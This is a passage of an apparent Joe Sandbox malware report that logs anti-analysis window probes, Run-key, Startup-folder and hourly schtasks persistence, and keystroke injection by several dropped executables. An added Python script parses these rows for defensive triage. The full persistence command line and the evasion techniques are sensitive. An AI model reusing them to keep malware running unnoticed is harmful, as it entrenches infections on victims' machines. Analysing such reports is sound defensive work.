                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmp
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\explorta.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmp
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
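The window-class probes listed above (PROCMON_WINDOW_CLASS, FilemonClass, RegmonClass, i.e. FindWindow checks for Process Monitor and the older Sysinternals Filemon/Regmon) and the persistence rows that follow them (the hourly schtasks task requested at the highest run level, the HKCU Run values, the Startup-folder file and the Windows\Tasks job) are what a triage analyst pulls out of a report like this. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses rows in the report's "Source: <process><observation>: <detail>" shape, tolerating both the fused columns and "Jump to behavior" link text of the page as extracted and a cleaned form with a " | " separator, de-duplicates the repeated rows, and summarises which analysis tools each process probed for and which persistence artefacts were written. The window-class-to-tool mapping and the handful of rows embedded as sample input are the author's own assumptions and constructions, copied from rows on this page.

```python
"""Summarise anti-analysis probes and persistence from Joe Sandbox-style rows.

Added example for this page, not code from the report or the sample.  It reads
rows shaped "Source: <process><observation>: <detail>" as they appear on the page
(process path fused to the observation, optional "Jump to behavior" link text)
and also the cleaned form with a " | " separator.
"""
import re
from collections import defaultdict

# Constructed sample input: a few rows copied in the page's own shape.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmpJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorta.jobJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exeJump to behavior
"""

ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<kind>Window searched|Process created|File created|"
    r"Registry value created or modified|Process information set):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?$"
)

# Window classes of analysis tools that the report shows the samples probing for
# with FindWindow: Process Monitor and the older Sysinternals Filemon/Regmon.
# Keys are lower-case because the page shows both "RegmonClass" and "Regmonclass".
ANALYSIS_TOOL_CLASSES = {
    "procmon_window_class": "Process Monitor",
    "filemonclass": "Filemon",
    "regmonclass": "Regmon",
}

# Locations whose mere creation is a persistence artefact (compared lower-case).
STARTUP_DIR = "\\start menu\\programs\\startup\\"
TASKS_DIR = "\\windows\\tasks\\"

# schtasks options worth extracting: task name, target, schedule, run level.
SCHTASKS_OPT_RE = re.compile(
    r'/(?P<opt>tn|tr|sc|rl)\s+(?:"(?P<q>[^"]*)"|(?P<u>\S+))', re.IGNORECASE
)


def parse_schtasks(cmdline):
    """Return {option: value} for /tn /tr /sc /rl, unquoting quoted values."""
    opts = {}
    for m in SCHTASKS_OPT_RE.finditer(cmdline):
        opts[m.group("opt").lower()] = m.group("q") if m.group("q") is not None else m.group("u")
    return opts


def triage(text):
    """Parse report rows; return tool probes per process and persistence artefacts."""
    tool_checks = defaultdict(set)  # process path -> analysis tools it looked for
    persistence = []                # one dict per artefact, in report order
    seen = set()                    # the report repeats rows; count each once
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        src, kind, detail = m.group("src"), m.group("kind"), m.group("detail")
        if (src, kind, detail) in seen:
            continue
        seen.add((src, kind, detail))
        low = detail.lower()
        if kind == "Window searched":
            cls = low.split("window name:", 1)[-1].strip()
            if cls in ANALYSIS_TOOL_CLASSES:
                tool_checks[src].add(ANALYSIS_TOOL_CLASSES[cls])
        elif kind == "Process created" and "schtasks" in low and "/create" in low:
            o = parse_schtasks(detail)
            persistence.append({"type": "scheduled_task", "by": src, "name": o.get("tn"),
                                "target": o.get("tr"), "schedule": o.get("sc"),
                                "run_level": o.get("rl")})
        elif kind == "Registry value created or modified" and "\\currentversion\\run" in low:
            # The page writes the value name after the key path, separated by a space.
            key_path, value_name = detail.rsplit(" ", 1)
            persistence.append({"type": "run_key", "by": src, "key": key_path, "value": value_name})
        elif kind == "File created" and (STARTUP_DIR in low or TASKS_DIR in low):
            persistence.append({"type": "startup_file", "by": src, "path": detail})
    return {"tool_checks": {k: sorted(v) for k, v in tool_checks.items()},
            "persistence": persistence}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_ROWS), indent=2))
```

Feed it the report's rows as plain text and it prints a JSON summary. Two things to read off that summary: the Chrome Apps shortcuts under Start Menu\Programs are not persistence (the filter only matches the Startup folder and Windows\Tasks), and the scheduled task is the artefact that matters most for cleanup, because /sc HOURLY re-launches the dropped MPGPH131.exe every hour and /rl HIGHEST asks for the task to run with the user's highest available token, so deleting only the Run values leaves the infection re-arming itself.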
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 4_2_000EF98E
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00161C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 4_2_00161C41
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
